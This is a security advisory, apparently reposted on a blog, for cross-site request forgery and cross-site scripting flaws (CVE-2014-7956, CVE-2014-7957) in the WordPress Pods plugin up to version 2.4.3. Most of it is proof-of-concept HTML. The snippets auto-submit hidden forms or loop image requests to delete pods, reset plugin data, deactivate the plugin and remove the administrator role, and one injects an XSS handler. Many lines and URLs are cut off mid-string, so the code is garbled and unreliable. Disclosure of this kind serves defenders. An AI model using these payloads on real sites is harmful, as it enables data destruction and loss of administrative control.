vulnerabilities
Author: Pietro Oliva
CVE: CVE-2014-7956, CVE-2014-7957
Product: pods
Affected version: pods <= 2.4.3
Vulnerabilities fixed in version: 2.5
XSS vulnerability (CVE-2014-7956, authentication is needed):
http://localhost/wp-admin/
Multiple CSRF (CVE-2014-7957,authentication needed):
CSRF 1 (bruteforce pods IDs and delete them):
<html>
<body>
<script>
target="http://localhost";
for (i=0; i<50;i++)
document.write('<img style="display:none"
src="'+target+'/wp-admin/
</script>
</body>
</html>
CSRF 2 (delete pods plugin data):
<html>
<body onload="document.forms[0].
<form method="post"
action="http://localhost/
<input type="hidden" name="pods_reset" value="Reset Pods settings and data ">
</form>
</html>
CSRF 3 (deactivate pods and delete data):
<html>
<body onload="document.forms[0].
<form method="post"
action="http://localhost/
Deactivate and Delete Pods data ">
<input type="hidden" name="pods_reset_deactivate" value=" Deactivate
and Delete Pods data ">
</form>
</html>
CSRF 4 (enable "roles and capabilities" component and delete admin role):
<html>
<script>
function continueExecution(){
document.write('<link rel="stylesheet"
href="http://localhost/
}
document.write('<link rel="stylesheet"
href="http://localhost/
setTimeout(continueExecution, 10000);
</script>
</html>
CSRF 4 XSS impact:
http://localhost/wp-admin/
onmouseenter="alert('xss')"
style="width:3000px;height:
Komentarų nėra:
Rašyti komentarą